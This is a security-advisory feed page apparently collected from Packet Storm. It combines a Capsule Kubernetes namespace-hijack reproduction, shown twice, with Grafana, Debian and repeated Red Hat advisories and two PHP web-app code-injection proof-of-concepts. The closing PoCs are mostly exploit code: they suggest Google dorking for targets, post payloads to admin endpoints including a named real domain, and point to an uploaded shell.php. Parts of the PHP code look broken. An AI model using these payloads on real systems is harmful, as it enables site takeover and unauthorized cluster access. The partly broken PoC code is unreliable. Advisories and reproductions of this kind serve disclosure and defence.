# Attack Vector
Then, let me briefly explain the reasons for the errors mentioned above: 1. The 'kubectl edit' command was used to patch the namespace, but this operation requires both 'get' and 'patch' permissions, hence the error. One should use methods like 'curl' to directly send a PATCH request; 2. The webhook does not intercept patch operations on 'kube-system' because 'kube-system' does not have an ownerReference.

# Below are my detailed reproduction steps
1. Create a test cluster
`kind create cluster --image=kindest/node:v1.24.15 --name=k8s`
2. Install the capsule
`helm install capsule projectcapsule/capsule -n capsule-system --create-namespace`
3. Create a tenant
```
kubectl create -f - << EOF
apiVersion: capsule.clastix.io/v1beta2
kind: Tenant
metadata:
  name: tenant1
spec:
  owners:
  - name: alice
    kind: User
EOF
```
4. Create user alice
```
./create-user.sh alice tenant1 capsule.clastix.io
export KUBECONFIG=alice-tenant1.kubeconfig
```
5. Patch kube-system (The first command is executed in the current shell, while the 2nd and 3rd commands require a different shell window because the current shell is being used as a proxy.)
```
kubectl proxy

export DATA='[{"op": "add", "path": "/metadata/ownerReferences", "value":[{"apiVersion": "capsule.clastix.io/v1beta2", "blockOwnerDeletion": true, "controller": true, "kind": "Tenant", "name": "tenant1", "uid": "ce3f2296-4aaa-45b0-a8fe-879d5096f193"}]}]'

curl http://localhost:8001/api/v1/namespaces/kube-system/ -X PATCH -d "$DATA" -H "Content-Type: application/json-patch+json"
```
7. Check the result
The kube-system is patched successfully.
![image](https://github.com/projectcapsule/capsule/assets/151004196/e2775304-c1f4-494d-ab15-14f6f33e29ec)


# Summary
The tenant-owner can patch any arbitrary namespace that has not been taken over by a tenant (i.e., namespaces without the ownerReference field), thereby gaining control of that namespace.

I would like to express my apologies once again. I have always been sincere in my research and communication, and I did not intend to disturb you on purpose.

**Attack Vector**

Then, let me briefly explain the reasons for the errors mentioned above: 1. The 'kubectl edit' command was used to patch the namespace, but this operation requires both 'get' and 'patch' permissions, hence the error. One should use methods like 'curl' to directly send a PATCH request; 2. The webhook does not intercept patch operations on 'kube-system' because 'kube-system' does not have an ownerReference.

**Below are my detailed reproduction steps**

1.  Create a test cluster  
    kind create cluster --image=kindest/node:v1.24.15 --name=k8s
2.  Install the capsule  
    helm install capsule projectcapsule/capsule -n capsule-system --create-namespace
3.  Create a tenant

    kubectl create -f - << EOF
    apiVersion: capsule.clastix.io/v1beta2
    kind: Tenant
    metadata:
      name: tenant1
    spec:
      owners:
      - name: alice
        kind: User
    EOF
    

4.  Create user alice

    ./create-user.sh alice tenant1 capsule.clastix.io
    export KUBECONFIG=alice-tenant1.kubeconfig
    

5.  Patch kube-system (The first command is executed in the current shell, while the 2nd and 3rd commands require a different shell window because the current shell is being used as a proxy.)

    kubectl proxy
    
    export DATA='[{"op": "add", "path": "/metadata/ownerReferences", "value":[{"apiVersion": "capsule.clastix.io/v1beta2", "blockOwnerDeletion": true, "controller": true, "kind": "Tenant", "name": "tenant1", "uid": "ce3f2296-4aaa-45b0-a8fe-879d5096f193"}]}]'
    
    curl http://localhost:8001/api/v1/namespaces/kube-system/ -X PATCH -d "$DATA" -H "Content-Type: application/json-patch+json"
    

7.  Check the result  
    The kube-system is patched successfully.  
    

**Summary**

The tenant-owner can patch any arbitrary namespace that has not been taken over by a tenant (i.e., namespaces without the ownerReference field), thereby gaining control of that namespace.

I would like to express my apologies once again. I have always been sincere in my research and communication, and I did not intend to disturb you on purpose.

**References**

*   GHSA-mq69-4j5w-3qwp
*   https://nvd.nist.gov/vuln/detail/CVE-2024-39690
*   projectcapsule/capsule@d620b04

GHSA-mq69-4j5w-3qwp: Capsule tenant owner with "patch namespace" permission can hijack system namespaces

Access control for plugin data sources protected by the ReqActions json field of the plugin.json is bypassed if the user or service account is granted associated access to any other data source, as the ReqActions check was not scoped to each specific datasource. The account must have prior query access to the impacted datasource.

**Grafana plugin data sources vulnerable to access control bypass**

Moderate severity GitHub Reviewed Published Aug 20, 2024 to the GitHub Advisory Database • Updated Aug 20, 2024

GHSA-hh8p-374f-qgr5: Grafana plugin data sources vulnerable to access control bypass

Debian Linux Security Advisory 5751-1 - Joshua Rogers that incorrect parsing of ESI variables in the Squid proxy caching server could result in memory corruption.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5751-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 19, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : squid  
CVE ID         : CVE-2024-37894

Joshua Rogers that incorrect parsing of ESI variables in the Squid proxy  
caching server could result in memory corruption.

For the stable distribution (bookworm), this problem has been fixed in  
version 5.7-2+deb12u2.

We recommend that you upgrade your squid packages.

For the detailed security status of squid please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/squid

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmbDaesACgkQEMKTtsN8  
TjbNvQ//daMjahyIHELJPJR2jU5j6kDccMddW6M17pfxYPbXZxRTR0UoSPTso37r  
0dBjamAMUky/9zuXgkiJ5NUrfOCZ9NQZher11tZ7KZy6c5Dub+fJG4VGkS8Tp0JV  
Pa9HZQN3W6esZ0boa3P6YI9Ug3jzidJNBbKcdH5VmggDfnQd+Ehfjs7YTeRcRCu3  
2+TUe4UzyWDfP/lTVZ4lTxuWeUlmob5X+c0qbFxc1MGb3SgPI6Uh9UXHAmohoERr  
jayqm906hZbUP5eFHmgnkrv438KEDeSF4ZghHYE8z/UuZX8P8t+pKI0GNiH/X4a3  
pWFG1UN6JYqe94WP7cfeSQDLT5xQ3pbc6HodOO9Lt6HIptEGPYTVSWj+YUEXv8AS  
3VZNZPxadPEzrwbidKntA4xisgLF2w7bz69Cv+sC4v4Lwrm+Z5dLOXmshPtn2zo/  
MgfZuLtzytgJ18Png/Fy00/yoN4UDD4LeCyIkh0rwZZa4xehAMkV1udBHzxb3uK4  
n+rkYLZWEQtLJHRidvm9bo3BAad8okZ4EFqSaGhZ1wTsu75eLqruHEge+kbZ2cxR  
Sd+bVuGQo27BZNYdoJMIECUbWDvxGzcfVVU9SL9hNTGRfE1aWpzNHi56zGEP3Eit  
T8bvafqgsGBZAGvloxTAen8IqtJ6lhg6WPkBKRWzdKey2WliUnM=  
=sgNp  
-----END PGP SIGNATURE-----

Debian Security Advisory 5751-1

Red Hat Security Advisory 2024-5608-03 - An update for libreoffice is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5608.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libreoffice security updateAdvisory ID:        RHSA-2024:5608-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5608Issue date:         2024-08-20Revision:           03CVE Names:          CVE-2024-6472====================================================================Summary: An update for libreoffice is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: bility to trust not validated macro signatures removed in high security mode (CVE-2024-6472)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6472References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2024-5608-03

Red Hat Security Advisory 2024-5607-03 - An update for libreoffice is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5607.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libreoffice security updateAdvisory ID:        RHSA-2024:5607-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5607Issue date:         2024-08-20Revision:           03CVE Names:          CVE-2024-6472====================================================================Summary: An update for libreoffice is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: bility to trust not validated macro signatures removed in high security mode (CVE-2024-6472)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6472References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2024-5607-03

Red Hat Security Advisory 2024-5599-03 - An update for libreoffice is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5599.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libreoffice security updateAdvisory ID:        RHSA-2024:5599-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5599Issue date:         2024-08-20Revision:           03CVE Names:          CVE-2024-6472====================================================================Summary: An update for libreoffice is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: bility to trust not validated macro signatures removed in high security mode (CVE-2024-6472)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6472References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2024-5599-03

Red Hat Security Advisory 2024-5598-03 - An update for libreoffice is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5598.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libreoffice security updateAdvisory ID:        RHSA-2024:5598-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5598Issue date:         2024-08-20Revision:           03CVE Names:          CVE-2024-6472====================================================================Summary: An update for libreoffice is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: bility to trust not validated macro signatures removed in high security mode (CVE-2024-6472)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6472References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2024-5598-03

Red Hat Security Advisory 2024-5584-03 - An update for libreoffice is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5584.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libreoffice security updateAdvisory ID:        RHSA-2024:5584-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5584Issue date:         2024-08-20Revision:           03CVE Names:          CVE-2024-6472====================================================================Summary: An update for libreoffice is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: bility to trust not validated macro signatures removed in high security mode (CVE-2024-6472)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6472References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2024-5584-03

Hospital Management System version 1.0 suffers from a code injection vulnerability.

=============================================================================================================================================  
| # Title     : Hospital Management System 1.0(WYSIWYG) code injection Vulnerability                                                        |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |  
| # Vendor    : https://phpgurukul.com/wp-content/uploads/2017/12/Hostel-Management-Syste-Updated-Code.zip                                  |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Part 01 : about-us.php

[+] This payload injects code of your choice into the database via NicEdit is a WYSIWYG editor V: 0.9 r25 which is called inside the file /hms/admin/about-us.php . 

   [+] Line 2  :  Make sure to include your database connection here

[+] Line 44 :  Send the form data using fetch API (Set your target url)

[+] save payload as poc.php in your localhost path .

[+] payload : 

<?php  
include('http://127.0.0.1/hospital/hms/admin/include/config.php'); // Make sure to include your database connection here

if (isset($_POST['submit'])) {  
    $pagetitle = $_POST['pagetitle'];  
    $pagedes = $con->real_escape_string($_POST['pagedes']);  
    $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'");

    if ($query) {  
        echo '<script>alert("About Us has been updated.")</script>';  
    } else {  
        echo '<script>alert("Something Went Wrong. Please try again.")</script>';  
    }  
    exit;  
}  
?>

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>indoushka | Update About Us Content</title>  
      
    <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>  
    <script type="text/javascript">  
        // Apply NicEdit to all text areas when the DOM is loaded  
        bkLib.onDomLoaded(nicEditors.allTextAreas);

        // Function to handle form submission using JavaScript  
        function submitForm(event) {  
            event.preventDefault(); // Prevent default form submission

            const pagetitle = document.getElementById('pagetitle').value;  
            const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content

            // Prepare the form data to be sent  
            const formData = new FormData();  
            formData.append('pagetitle', pagetitle);  
            formData.append('pagedes', pagedes);  
            formData.append('submit', true);

            // Send the form data using fetch API  
            fetch('http://127.0.0.1/hospital/hms/admin/about-us.php', {  
                method: 'POST',  
                body: formData,  
            })  
            .then(response => response.text())  
            .then(data => {  
                alert('About Us content has been updated successfully.');  
                console.log(data); // Handle the response from the server  
            })  
            .catch(error => {  
                console.error('Error:', error);  
            });  
        }  
    </script>  
    <style>  
        /* Center the form container */  
        .editor-container {  
            max-width: 800px;  
            margin: 0 auto; /* Center horizontally */  
            padding: 20px;  
            text-align: center; /* Center the content inside */  
        }

        /* Ensure the textarea takes the full width */  
        #pagedes {  
            width: 100%;  
            height: 300px;  
            margin: 0 auto;  
        }  
    </style>  
</head>  
<body>  
    <div id="app">  
        <div class="app-content">  
            <div class="main-content">  
                <div class="wrap-content container" id="container">  
                      
                    <section id="page-title">  
                        <div class="row">  
                            <div class="col-sm-8">  
                                <h1 class="mainTitle">Update the About Us Content</h1>  
                            </div>

                                                          </li>  
                            </ol>  
                        </div>  
                    </section>  
                      
                    <div class="container-fluid container-fullw bg-white">  
                        <div class="row">  
                            <div class="col-md-12">  
                                  
                                <div class="editor-container">  
                                    <form class="forms-sample" method="post" onsubmit="submitForm(event);">  
                                        <div class="form-group">  
                                            <label for="pagetitle">Page Title</label>  
                                            <input id="pagetitle" name="pagetitle" type="text" class="form-control" required>  
                                        </div>  
                                        <div class="form-group">  
                                            <label for="pagedes">Page Description</label>  
                                              
                                            <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>  
                                        </div>  
                                        <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>  
                                    </form>  
                                </div>  
                            </div>  
                        </div>  
                    </div>  
                      
                </div>  
            </div>  
        </div>  
    </div>  
      
</body>  
</html>

---------------------- [+] Part 02 : contact.php [+] --------------------

[+] Line 4  :  Make sure to include your database connection here

[+] Line 60 :  Send the form data using fetch API (Set your target url)

[+] save payload as poc.php in your localhost path .

[+] payload : 

<?php

// عنوان الخادم الخارجي  
$url = 'http://127.0.0.1/hospital/hms/admin/include/config.php';

// جلب البيانات من الخادم الخارجي  
$response = file_get_contents($url);

// التحقق من وجود البيانات  
if ($response !== FALSE) {  
    // التعامل مع البيانات  
    echo $response;  
} else {  
    echo 'حدث خطأ أثناء جلب البيانات.';  
}

if (isset($_POST['submit'])) {  
    $pagetitle = $_POST['pagetitle'];  
    $pagedes = $con->real_escape_string($_POST['pagedes']);  
    $email = $con->real_escape_string($_POST['email']);  
    $mobnum = $con->real_escape_string($_POST['mobnum']);

        $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes', Email='$email', MobileNumber='$mobnum' WHERE PageType='contactus'");

    if ($query) {  
        echo '<script>alert("Contact Us has been updated.")</script>';  
    } else {  
        echo '<script>alert("Something Went Wrong. Please try again.")</script>';  
    }  
    exit;  
}

?>  
<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Admin | Update Contact Us Content</title>  
      
    <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>  
    <script type="text/javascript">  
        bkLib.onDomLoaded(nicEditors.allTextAreas);

        function submitForm(event) {  
            event.preventDefault();

            const pagetitle = document.getElementById('pagetitle').value;  
            const pagedes = nicEditors.findEditor('pagedes').getContent();  
            const email = document.getElementById('email').value;  
            const mobnum = document.getElementById('mobnum').value;

            const formData = new FormData();  
            formData.append('pagetitle', pagetitle);  
            formData.append('pagedes', pagedes);  
            formData.append('email', email);  
            formData.append('mobnum', mobnum);  
            formData.append('submit', true);

            fetch('http://127.0.0.1/hospital/hms/admin/contact.php', {  
                method: 'POST',  
                body: formData,  
            })  
            .then(response => response.text())  
            .then(data => {  
                alert('Contact Us content has been updated successfully.');  
                console.log(data);  
            })  
            .catch(error => {  
                console.error('Error:', error);  
            });  
        }  
    </script>  
    <style>  
        .editor-container {  
            max-width: 800px;  
            margin: 0 auto;  
            padding: 20px;  
            text-align: center;  
        }

        #pagedes {  
            width: 100%;  
            height: 300px;  
            margin: 0 auto;  
        }  
    </style>  
</head>  
<body>  
    <div id="app">  
        <div class="app-content">  
            <div class="main-content">  
                <div class="wrap-content container" id="container">  
                    <section id="page-title">  
                        <div class="row">  
                            <div class="col-sm-8">  
                                <h1 class="mainTitle">Admin | Update Contact Us Content</h1>  
                            </div>  
                            <ol class="breadcrumb">  
                                <li class="active">  
                                    <span>Update Contact Us Content</span>  
                                </li>  
                            </ol>  
                        </div>  
                    </section>  
                    <div class="container-fluid container-fullw bg-white">  
                        <div class="row">  
                            <div class="col-md-12">  
                                <div class="editor-container">  
                                    <form class="forms-sample" method="post" onsubmit="submitForm(event);">  
                                        <div class="form-group">  
                                            <label for="pagetitle">Page Title</label>  
                                            <input id="pagetitle" name="pagetitle" type="text" class="form-control" required>  
                                        </div>  
                                        <div class="form-group">  
                                            <label for="pagedes">Page Description</label>  
                                            <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>  
                                        </div>  
                                        <div class="form-group">  
                                            <label for="email">Email</label>  
                                            <input id="email" name="email" type="email" class="form-control" required>  
                                        </div>  
                                        <div class="form-group">  
                                            <label for="mobnum">Mobile Number</label>  
                                            <input id="mobnum" name="mobnum" type="text" class="form-control" required>  
                                        </div>  
                                        <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>  
                                    </form>  
                                </div>  
                            </div>  
                        </div>  
                    </div>  
                </div>  
            </div>  
        </div>  
    </div>  
</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Hospital Management System 1.0 Code Injection

Event Registration and Attendance System version 1.0 suffers from a code injection vulnerability.

=============================================================================================================================================| # Title     : Event Registration and Attendance System 1.0 wysiwyg code injection Vulnerability                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip                                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected item : admin_class.php    $data .= ", content = '".htmlentities(str_replace("'","&#x2019;",$content))."' ";    if(!empty($_FILES['cover']['tmp_name'])){      $fname = strtotime(date("Y-m-d H:i"))."_".(str_replace(" ","-",$_FILES['cover']['name']));      $move = move_uploaded_file($_FILES['cover']['tmp_name'],'../assets/uploads/content_images/'. $fname);      $protocol = strtolower(substr($_SERVER["SERVER_PROTOCOL"],0,5))=='https'?'https':'http';      $hostName = $_SERVER['HTTP_HOST'];      $path =explode('/',$_SERVER['PHP_SELF']);      $currentPath = '/'.$path[1];       if($move){            $data .= ", cover_img='$fname' ";      }    }  [+] Line 27 : Set your target url.[+] This payload is WYSIWYG based The page can be edited remotely and a malicious executable file can be uploaded ,via summernote is a WYSIWYG editor V: 0.8.18.[+] save payload as poc.html [+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Manage About Page</title>        <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">    <link href="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.css" rel="stylesheet">    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>    <script src="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.js"></script></head><body>    <div class="container mt-5">        <div class="col-lg-12">            <div class="card card-outline card-primary">                <div class="card-body">                    <form action="" id="manage-about">                        <div class="form-group">                            <textarea name="content" id="content" cols="30" rows="10" class="summernote2 form-control">                                <p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; color: rgb(0, 0, 0); font-family: 'Open Sans', Arial, sans-serif; font-size: 14px;">indoushka.</p>                            </textarea>                        </div>                    </form>                </div>                <div class="card-footer border-top border-info">                    <div class="d-flex w-100 justify-content-center align-items-center">                        <button class="btn btn-flat bg-gradient-primary mx-2" form="manage-about">Save</button>                    </div>                </div>            </div>        </div>    </div>    <script>        $(document).ready(function(){            // Initialize Summernote Editor            $('.summernote2').summernote({                height: 300,                toolbar: [                    ['style', ['style']],                    ['font', ['bold', 'italic', 'underline', 'strikethrough', 'superscript', 'subscript', 'clear']],                    ['fontname', ['fontname']],                    ['fontsize', ['fontsize']],                    ['color', ['color']],                    ['para', ['ol', 'ul', 'paragraph', 'height']],                    ['table', ['table']],                    ['insert', ['link', 'picture']],                    ['view', ['undo', 'redo', 'fullscreen', 'codeview', 'help']]                ],                callbacks: {                    onImageUpload: function(files) {                        saveImg(files[0]);  // Handle image upload                    }                }            });            // Function to save uploaded image            function saveImg(_file) {                var data = new FormData();                data.append("file", _file);                $.ajax({                    data: data,                    type: "POST",                    url: "http://www.news.witnessradio.org/admin/ajax.php?action=save_image",                    cache: false,                    contentType: false,                    processData: false,                    success: function(resp) {                        var image = $('<img>').attr('src', resp);                        $('.summernote2').summernote("insertNode", image[0]);                    }                });            }        });        // Form Submission        $('#manage-about').submit(function(e) {            e.preventDefault();            start_load();  // Start a loading indicator (you need to define this function)            $.ajax({                url: 'http://www.news.witnessradio.org/admin/ajax.php?action=save_about',                data: new FormData($(this)[0]),                cache: false,                contentType: false,                processData: false,                method: 'POST',                type: 'POST',                success: function(resp) {                    if(resp == 1) {                        alert_toast('Data successfully saved', "success");                        end_load();  // End the loading indicator (you need to define this function)                    }                }            });        });        // Optional: Define start_load and end_load functions        function start_load() {            // Add your loading indicator logic here        }        function end_load() {            // Remove your loading indicator logic here        }        function alert_toast(message, type) {            alert(message); // Basic alert. Replace with a better toast notification if needed.        }    </script></body></html>[+] path of evil : http://127.0.0.1/news_portal/assets/uploads/content_images/shell.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#js